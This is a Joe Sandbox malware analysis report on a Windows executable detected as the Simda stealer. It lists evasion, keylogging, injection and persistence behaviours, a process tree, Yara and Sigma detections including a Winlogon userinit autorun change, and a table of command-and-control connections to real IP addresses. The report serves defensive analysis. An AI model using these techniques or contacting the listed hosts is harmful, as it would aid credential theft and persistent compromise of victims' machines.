Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UMwpXhA46R.exe

Overview

General Information

Sample name:UMwpXhA46R.exe
renamed because original name is a hash value
Original sample name:ef7eacbab6cd35771675717a0a84939f529c1ac4.exe
Analysis ID:1553852
MD5:239b74d7ac38014e61cc335630ac22d6
SHA1:ef7eacbab6cd35771675717a0a84939f529c1ac4
SHA256:a53ec0d01746cd6c44b9c207df3101c8fe7e78bbe08a125dad833b1a41636668
Tags:exeuser-NDA0E
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UMwpXhA46R.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\UMwpXhA46R.exe" MD5: 239B74D7AC38014E61CC335630AC22D6)
    • svchost.exe (PID: 1112 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: E132561B9EE04A2EDDF6460BE4A89362)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6912 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1220 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 2268 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3472 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 8004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1492 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6628 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 5128 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 2948 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3416 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3328 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3896 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6212 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1476 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
Click to see the 103 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.13.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.886c00.3.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.2c70000.4.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
Click to see the 192 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Files With System Process Name In Unsuspected Locations
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\UMwpXhA46R.exe, ProcessId: 7020, TargetFilename: C:\Windows\apppatch\svchost.exe
Sigma detected: System File Execution Location Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1112, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:50:41.413497+010020229301A Network Trojan was detected20.109.210.53443192.168.2.649809TCP
2024-11-11T18:51:20.479116+010020229301A Network Trojan was detected4.245.163.56443192.168.2.659201TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:50:28.388425+010020181411A Network Trojan was detected18.208.156.24880192.168.2.649714TCP
2024-11-11T18:50:28.400852+010020181411A Network Trojan was detected3.94.10.3480192.168.2.649715TCP
2024-11-11T18:50:29.056090+010020181411A Network Trojan was detected44.221.84.10580192.168.2.649720TCP
2024-11-11T18:50:45.509709+010020181411A Network Trojan was detected52.34.198.22980192.168.2.653361TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:50:28.388425+010020377711A Network Trojan was detected18.208.156.24880192.168.2.649714TCP
2024-11-11T18:50:28.400852+010020377711A Network Trojan was detected3.94.10.3480192.168.2.649715TCP
2024-11-11T18:50:29.056090+010020377711A Network Trojan was detected44.221.84.10580192.168.2.649720TCP
2024-11-11T18:50:45.509709+010020377711A Network Trojan was detected52.34.198.22980192.168.2.653361TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:50:28.384108+010020210221A Network Trojan was detected1.1.1.153192.168.2.663778UDP
2024-11-11T18:51:02.022620+010020210221A Network Trojan was detected1.1.1.153192.168.2.658475UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:50:20.242899+010028048521Malware Command and Control Activity Detected192.168.2.652127178.162.203.22680TCP
2024-11-11T18:50:28.382178+010028048521Malware Command and Control Activity Detected192.168.2.64971418.208.156.24880TCP
2024-11-11T18:50:28.394575+010028048521Malware Command and Control Activity Detected192.168.2.6497153.94.10.3480TCP
2024-11-11T18:50:28.853586+010028048521Malware Command and Control Activity Detected192.168.2.64971723.253.46.6480TCP
2024-11-11T18:50:28.967187+010028048521Malware Command and Control Activity Detected192.168.2.64972175.2.71.19980TCP
2024-11-11T18:50:28.995545+010028048521Malware Command and Control Activity Detected192.168.2.64971944.221.84.10580TCP
2024-11-11T18:50:29.049618+010028048521Malware Command and Control Activity Detected192.168.2.64972044.221.84.10580TCP
2024-11-11T18:50:29.129713+010028048521Malware Command and Control Activity Detected192.168.2.649722208.100.26.24580TCP
2024-11-11T18:50:29.132050+010028048521Malware Command and Control Activity Detected192.168.2.649718188.114.96.380TCP
2024-11-11T18:50:29.132181+010028048521Malware Command and Control Activity Detected192.168.2.649723199.59.243.22780TCP
2024-11-11T18:50:29.316635+010028048521Malware Command and Control Activity Detected192.168.2.64972585.17.31.12280TCP
2024-11-11T18:50:29.332735+010028048521Malware Command and Control Activity Detected192.168.2.64972675.2.71.19980TCP
2024-11-11T18:50:29.336475+010028048521Malware Command and Control Activity Detected192.168.2.64972423.253.46.6480TCP
2024-11-11T18:50:29.938801+010028048521Malware Command and Control Activity Detected192.168.2.649722208.100.26.24580TCP
2024-11-11T18:50:30.305367+010028048521Malware Command and Control Activity Detected192.168.2.649716199.191.50.8380TCP
2024-11-11T18:50:30.453744+010028048521Malware Command and Control Activity Detected192.168.2.64972985.17.31.12280TCP
2024-11-11T18:50:30.765094+010028048521Malware Command and Control Activity Detected192.168.2.649728154.212.231.8280TCP
2024-11-11T18:50:31.135319+010028048521Malware Command and Control Activity Detected192.168.2.649728154.212.231.8280TCP
2024-11-11T18:50:31.277356+010028048521Malware Command and Control Activity Detected192.168.2.649730188.114.96.3443TCP
2024-11-11T18:50:31.640900+010028048521Malware Command and Control Activity Detected192.168.2.649718188.114.96.380TCP
2024-11-11T18:50:32.163788+010028048521Malware Command and Control Activity Detected192.168.2.649716199.191.50.8380TCP
2024-11-11T18:50:32.974570+010028048521Malware Command and Control Activity Detected192.168.2.649732188.114.96.3443TCP
2024-11-11T18:50:33.801283+010028048521Malware Command and Control Activity Detected192.168.2.64973913.248.169.4880TCP
2024-11-11T18:50:34.292654+010028048521Malware Command and Control Activity Detected192.168.2.64974518.208.156.24880TCP
2024-11-11T18:50:34.316861+010028048521Malware Command and Control Activity Detected192.168.2.6497463.94.10.3480TCP
2024-11-11T18:50:34.461380+010028048521Malware Command and Control Activity Detected192.168.2.649740188.114.97.380TCP
2024-11-11T18:50:35.422578+010028048521Malware Command and Control Activity Detected192.168.2.649753103.150.10.4880TCP
2024-11-11T18:50:36.286835+010028048521Malware Command and Control Activity Detected192.168.2.649748188.114.97.3443TCP
2024-11-11T18:50:36.525173+010028048521Malware Command and Control Activity Detected192.168.2.649753103.150.10.4880TCP
2024-11-11T18:50:36.618406+010028048521Malware Command and Control Activity Detected192.168.2.649740188.114.97.380TCP
2024-11-11T18:50:38.639221+010028048521Malware Command and Control Activity Detected192.168.2.649770188.114.97.3443TCP
2024-11-11T18:50:39.231729+010028048521Malware Command and Control Activity Detected192.168.2.64978776.223.67.18980TCP
2024-11-11T18:50:39.333074+010028048521Malware Command and Control Activity Detected192.168.2.64978664.225.91.7380TCP
2024-11-11T18:50:39.459120+010028048521Malware Command and Control Activity Detected192.168.2.64979344.221.84.10580TCP
2024-11-11T18:50:39.661493+010028048521Malware Command and Control Activity Detected192.168.2.649794103.224.212.21080TCP
2024-11-11T18:50:39.707541+010028048521Malware Command and Control Activity Detected192.168.2.649795103.224.182.25280TCP
2024-11-11T18:50:40.071995+010028048521Malware Command and Control Activity Detected192.168.2.649796154.85.183.5080TCP
2024-11-11T18:50:40.396288+010028048521Malware Command and Control Activity Detected192.168.2.649796154.85.183.5080TCP
2024-11-11T18:50:42.059796+010028048521Malware Command and Control Activity Detected192.168.2.64982164.225.91.7380TCP
2024-11-11T18:50:42.207628+010028048521Malware Command and Control Activity Detected192.168.2.64982272.52.179.17480TCP
2024-11-11T18:50:42.710031+010028048521Malware Command and Control Activity Detected192.168.2.64982972.52.179.17480TCP
2024-11-11T18:50:45.503052+010028048521Malware Command and Control Activity Detected192.168.2.65336152.34.198.22980TCP
2024-11-11T18:50:47.379554+010028048521Malware Command and Control Activity Detected192.168.2.65337744.221.84.10580TCP
2024-11-11T18:50:48.461931+010028048521Malware Command and Control Activity Detected192.168.2.649722208.100.26.24580TCP
2024-11-11T18:50:48.644765+010028048521Malware Command and Control Activity Detected192.168.2.649718188.114.96.380TCP
2024-11-11T18:50:48.665125+010028048521Malware Command and Control Activity Detected192.168.2.649728154.212.231.8280TCP
2024-11-11T18:50:48.686836+010028048521Malware Command and Control Activity Detected192.168.2.649722208.100.26.24580TCP
2024-11-11T18:50:48.810984+010028048521Malware Command and Control Activity Detected192.168.2.653397199.59.243.22780TCP
2024-11-11T18:50:48.819147+010028048521Malware Command and Control Activity Detected192.168.2.65464385.17.31.12280TCP
2024-11-11T18:50:48.827041+010028048521Malware Command and Control Activity Detected192.168.2.65464223.253.46.6480TCP
2024-11-11T18:50:48.845213+010028048521Malware Command and Control Activity Detected192.168.2.65464475.2.71.19980TCP
2024-11-11T18:50:49.127177+010028048521Malware Command and Control Activity Detected192.168.2.649728154.212.231.8280TCP
2024-11-11T18:50:49.343575+010028048521Malware Command and Control Activity Detected192.168.2.65464823.253.46.6480TCP
2024-11-11T18:50:49.581438+010028048521Malware Command and Control Activity Detected192.168.2.65464775.2.71.199443TCP
2024-11-11T18:50:49.656007+010028048521Malware Command and Control Activity Detected192.168.2.649716199.191.50.8380TCP
2024-11-11T18:50:49.693241+010028048521Malware Command and Control Activity Detected192.168.2.65464685.17.31.12280TCP
2024-11-11T18:50:49.946205+010028048521Malware Command and Control Activity Detected192.168.2.654645188.114.96.3443TCP
2024-11-11T18:50:50.392760+010028048521Malware Command and Control Activity Detected192.168.2.649718188.114.96.380TCP
2024-11-11T18:50:51.677988+010028048521Malware Command and Control Activity Detected192.168.2.654664188.114.96.3443TCP
2024-11-11T18:50:52.549462+010028048521Malware Command and Control Activity Detected192.168.2.649753103.150.10.4880TCP
2024-11-11T18:50:52.661556+010028048521Malware Command and Control Activity Detected192.168.2.649740188.114.97.380TCP
2024-11-11T18:50:53.193925+010028048521Malware Command and Control Activity Detected192.168.2.649753103.150.10.4880TCP
2024-11-11T18:50:54.724755+010028048521Malware Command and Control Activity Detected192.168.2.654680188.114.97.3443TCP
2024-11-11T18:50:55.237760+010028048521Malware Command and Control Activity Detected192.168.2.649740188.114.97.380TCP
2024-11-11T18:50:58.118452+010028048521Malware Command and Control Activity Detected192.168.2.654701188.114.97.3443TCP
2024-11-11T18:50:58.559668+010028048521Malware Command and Control Activity Detected192.168.2.649796154.85.183.5080TCP
2024-11-11T18:50:58.867087+010028048521Malware Command and Control Activity Detected192.168.2.654724103.224.212.21080TCP
2024-11-11T18:50:58.868021+010028048521Malware Command and Control Activity Detected192.168.2.654725103.224.182.25280TCP
2024-11-11T18:50:58.874229+010028048521Malware Command and Control Activity Detected192.168.2.649796154.85.183.5080TCP
2024-11-11T18:51:01.715916+010028048521Malware Command and Control Activity Detected192.168.2.65376472.52.179.17480TCP
2024-11-11T18:51:02.257245+010028048521Malware Command and Control Activity Detected192.168.2.65376672.52.179.17480TCP
2024-11-11T18:51:02.644676+010028048521Malware Command and Control Activity Detected192.168.2.65377399.83.170.380TCP
2024-11-11T18:51:02.653221+010028048521Malware Command and Control Activity Detected192.168.2.65377444.221.84.10580TCP
2024-11-11T18:51:02.687438+010028048521Malware Command and Control Activity Detected192.168.2.653772162.255.119.10280TCP
2024-11-11T18:51:02.851434+010028048521Malware Command and Control Activity Detected192.168.2.653777199.59.243.22780TCP
2024-11-11T18:51:02.871820+010028048521Malware Command and Control Activity Detected192.168.2.653776208.100.26.24580TCP
2024-11-11T18:51:03.077021+010028048521Malware Command and Control Activity Detected192.168.2.6521193.94.10.3480TCP
2024-11-11T18:51:03.122626+010028048521Malware Command and Control Activity Detected192.168.2.652122199.59.243.22780TCP
2024-11-11T18:51:03.122914+010028048521Malware Command and Control Activity Detected192.168.2.65212144.221.84.10580TCP
2024-11-11T18:51:03.129382+010028048521Malware Command and Control Activity Detected192.168.2.652123208.100.26.24580TCP
2024-11-11T18:51:03.131696+010028048521Malware Command and Control Activity Detected192.168.2.652125178.162.203.22680TCP
2024-11-11T18:51:03.215055+010028048521Malware Command and Control Activity Detected192.168.2.652124162.255.119.10280TCP
2024-11-11T18:51:03.250811+010028048521Malware Command and Control Activity Detected192.168.2.65212918.208.156.24880TCP
2024-11-11T18:51:03.387344+010028048521Malware Command and Control Activity Detected192.168.2.652126188.114.96.380TCP
2024-11-11T18:51:03.476165+010028048521Malware Command and Control Activity Detected192.168.2.652133199.59.243.22780TCP
2024-11-11T18:51:03.512905+010028048521Malware Command and Control Activity Detected192.168.2.652128188.114.96.380TCP
2024-11-11T18:51:05.390728+010028048521Malware Command and Control Activity Detected192.168.2.65214544.221.84.10580TCP
2024-11-11T18:51:05.395317+010028048521Malware Command and Control Activity Detected192.168.2.65214644.221.84.10580TCP
2024-11-11T18:51:05.472086+010028048521Malware Command and Control Activity Detected192.168.2.6521473.94.10.3480TCP
2024-11-11T18:51:05.478958+010028048521Malware Command and Control Activity Detected192.168.2.65215044.221.84.10580TCP
2024-11-11T18:51:05.495054+010028048521Malware Command and Control Activity Detected192.168.2.652149208.100.26.24580TCP
2024-11-11T18:51:08.013364+010028048521Malware Command and Control Activity Detected192.168.2.652149208.100.26.24580TCP
2024-11-11T18:51:08.359590+010028048521Malware Command and Control Activity Detected192.168.2.652163178.162.203.22680TCP
2024-11-11T18:51:08.770082+010028048521Malware Command and Control Activity Detected192.168.2.65217299.83.170.380TCP
2024-11-11T18:51:09.031576+010028048521Malware Command and Control Activity Detected192.168.2.65217091.195.240.1980TCP
2024-11-11T18:51:09.288928+010028048521Malware Command and Control Activity Detected192.168.2.653776208.100.26.24580TCP
2024-11-11T18:51:09.495150+010028048521Malware Command and Control Activity Detected192.168.2.65021844.221.84.10580TCP
2024-11-11T18:51:09.580373+010028048521Malware Command and Control Activity Detected192.168.2.650219178.162.203.22680TCP
2024-11-11T18:51:09.643025+010028048521Malware Command and Control Activity Detected192.168.2.65021099.83.170.3443TCP
